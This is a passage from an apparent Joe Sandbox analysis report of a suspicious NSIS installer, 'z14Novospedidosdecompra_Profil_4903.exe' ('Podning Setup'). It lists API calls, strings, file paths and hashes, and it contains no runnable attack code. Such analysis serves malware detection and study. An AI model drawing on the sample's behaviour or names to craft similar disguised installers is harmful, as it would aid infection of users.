                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EA
                                                                                              • GetLastError.KERNEL32 ref: 004056F4
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A4
                                                                                              • C:\Users\user\Desktop, xrefs: 0040567E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                              • API String ID: 3449924974-2028306314
                                                                                              • Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                              • Instruction ID: dfae01ed47dc7750d2476d71b6e364c3d252909874df994a371284b211a748b1
                                                                                              • Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                              • Instruction Fuzzy Hash: 18011A71D10619DADF009FA0CA447EFBFB8EF14304F00443AD549B6190E7799608CFA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                              • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                              • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2667972263-0
                                                                                              • Opcode ID: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
                                                                                              • Instruction ID: 1aef917cd227803a683e0008524bb9a83fcfbb8b8ade77014dfab24c7f5e3f69
                                                                                              • Opcode Fuzzy Hash: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
                                                                                              • Instruction Fuzzy Hash: F121C172800128BBCF216FA5CE49D9E7E79EF09324F20023AF510762E1C7795D418FA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1912718029-0
                                                                                              • Opcode ID: 1537f09e12a9e60e0b2a8eae30c6507c5457e656f0290ab1b216bb77a8747b60
                                                                                              • Instruction ID: a55e164afb4a2c5db24f06852be026e23ac61ce6859740a963365f2f7f7eec81
                                                                                              • Opcode Fuzzy Hash: 1537f09e12a9e60e0b2a8eae30c6507c5457e656f0290ab1b216bb77a8747b60
                                                                                              • Instruction Fuzzy Hash: 2F116771904119FFEF11AF90DF8CEAE3B79FB54388B10003AF905E10A0D7B49E55AA28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: 654fe9a3b94fa22656c9e0fad6745143c48d35558dbd85a331d0b39ad963d5af
                                                                                              • Instruction ID: d5b0b812c52730b156692ce296a05b57ce8d9064807eae1c9fc7a35bbe74f0db
                                                                                              • Opcode Fuzzy Hash: 654fe9a3b94fa22656c9e0fad6745143c48d35558dbd85a331d0b39ad963d5af
                                                                                              • Instruction Fuzzy Hash: C7F0E172501504AFD701DBE4DE88CEEBBBDEB48311B10447AF541F51A1CA749D018B28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00401D59
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                              • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401DD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                              • String ID:
                                                                                              • API String ID: 3808545654-0
                                                                                              • Opcode ID: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
                                                                                              • Instruction ID: 1901d7d296450183f5894fa9bbb5198f988e596920eebf68b9e2cfe033e75292
                                                                                              • Opcode Fuzzy Hash: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
                                                                                              • Instruction Fuzzy Hash: 0A016271984640FFEB01ABB4AF8AB9A3F75AF65301F104579E541F61E2D97800059B2D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                                                              • wsprintfW.USER32 ref: 00404A15
                                                                                              • SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s
                                                                                              • API String ID: 3540041739-3551169577
                                                                                              • Opcode ID: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
                                                                                              • Instruction ID: 0b736bf888c47b86caf201b097c22cff5488322ea99b5df57e3066faec5b3164
                                                                                              • Opcode Fuzzy Hash: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
                                                                                              • Instruction Fuzzy Hash: 9011E773A041283BDB10957D9C41EAF329CAB85334F254237FA25F31D1D978CD2182E9
                                                                                              Uniqueness
                                                                                              • Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Timeout
                                                                                              • String ID: !
                                                                                              • API String ID: 1777923405-2657877971
                                                                                              • Opcode ID: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                              • Instruction ID: 7183083e97b306686418f33f328e020de39305092e82b8c4ae23370839422ec4
                                                                                              • Opcode Fuzzy Hash: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                              • Instruction Fuzzy Hash: 48219071940209BEEF01AFB5CE4AABE7B75EB44744F10403EF601B61D1D6B89A40DB68
                                                                                              Uniqueness
                                                                                              • Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • SetWindowTextW.USER32(00000000,Podning Setup), ref: 00403C07
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: TextWindow
                                                                                              • String ID: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"$1033$Podning Setup
                                                                                              • API String ID: 530164218-470383153
                                                                                              • Opcode ID: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
                                                                                              • Instruction ID: 847b53d7ec13df621055667e1e13bb36484023f01c55a5fe093bb98d5154ae24
                                                                                              • Opcode Fuzzy Hash: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
                                                                                              • Instruction Fuzzy Hash: 0611F035B046118BC3209F15DC40A737BBDEB8971A328417FE901AB3E1CB3DAD028B98
                                                                                              Uniqueness
                                                                                              • Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(?,?,0040B5D0,000000FF,C:\Windows\resources\uncriticizables.dll,00000400,?,?,00000021), ref: 00402583
                                                                                              • lstrlenA.KERNEL32(C:\Windows\resources\uncriticizables.dll,?,?,0040B5D0,000000FF,C:\Windows\resources\uncriticizables.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                              • String ID: C:\Windows\resources\uncriticizables.dll
                                                                                              • API String ID: 3109718747-3127695999
                                                                                              • Opcode ID: b89ab65cbe32a9b0f064df4d6d3eddc4a16b9363d27f126e6304827e28b96444
                                                                                              • Instruction ID: 0e395622636dcde05068836be4baa4a456a4d64089cc24394ac90f0f0b10d43f
                                                                                              • Opcode Fuzzy Hash: b89ab65cbe32a9b0f064df4d6d3eddc4a16b9363d27f126e6304827e28b96444
                                                                                              • Instruction Fuzzy Hash: A511E772A01204BADB10AFB18F4EA9E32659F54354F24403BF502F61C1DAFC9A41966E
                                                                                              Uniqueness
                                                                                              • Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A0A
                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A14
                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405A26
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A04
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 2659869361-3081826266
                                                                                              • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                              • Instruction ID: e6cb25dffc9e5a2bb3a1dbad45cd46e4450efeecdd43702cab0598af126a0af2
                                                                                              • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                              • Instruction Fuzzy Hash: 06D05E31211534AAC211AB589D05CDB629C9E46304341442AF241B20A1C779595186FE
                                                                                              Uniqueness
                                                                                              • Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00402D9D
                                                                                              • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00402DE6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                              • String ID:
                                                                                              • API String ID: 2102729457-0
                                                                                              • Opcode ID: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                                                              • Instruction ID: 9565580f91e6c8b036764476f8379a8a9497e0cf8b36b33943f0ae23fa557cda
                                                                                              • Opcode Fuzzy Hash: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                                                              • Instruction Fuzzy Hash: FFF05E30501520BBC671AB20FF4DA9B7B64FB40B11701447AF042B15E4C7B80D828B9C
                                                                                              Uniqueness
                                                                                              • Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                                • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Podning Setup,NSIS Error), ref: 0040605D
                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                              • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B65
                                                                                              • GetFileAttributesW.KERNEL32(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B75
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 3248276644-3081826266
                                                                                              • Opcode ID: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                              • Instruction ID: 63a6569c831ee5581447f3e1e8ec18e6ac74a78ddfb021a14ce772f4501d9fee
                                                                                              • Opcode Fuzzy Hash: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                              • Instruction Fuzzy Hash: 32F0F435100E1119D62632361C49BAF2664CF82324B4A023FF952B22D1DB3CB993CC7E
                                                                                              Uniqueness
                                                                                              • Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00405152
                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004051A3
                                                                                                • Part of subcall function 00404160: SendMessageW.USER32(00010458,00000000,00000000,00000000), ref: 00404172
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                              • Instruction ID: 3a757cf3c9e7612e230a46be1b13aa2d047f9f757cddf2eb8b5381add8f22129
                                                                                              • Opcode Fuzzy Hash: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                              • Instruction Fuzzy Hash: 43017C71A00609ABEB218F51ED84B9B3B2AEB84750F504037F6047D1E0C77A8C929E2A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037DC,004035F2,?), ref: 0040381E
                                                                                              • GlobalFree.KERNEL32(?), ref: 00403825
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403804
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$GlobalLibrary
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 1100898210-3081826266
                                                                                              • Opcode ID: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                              • Instruction ID: c0ef5988400ca03a2919d730679f4c8cdc7c60ab336a91eb80d60266565c467d
                                                                                              • Opcode Fuzzy Hash: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                              • Instruction Fuzzy Hash: D2E0C2735015309BC6212F45ED0871EB7ACAF59B22F0580BAF8907B26087781C428FD8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,00442800,00442800,80000000,00000003,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405A56
                                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,00442800,00442800,80000000,00000003,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405A66
                                                                                              Strings
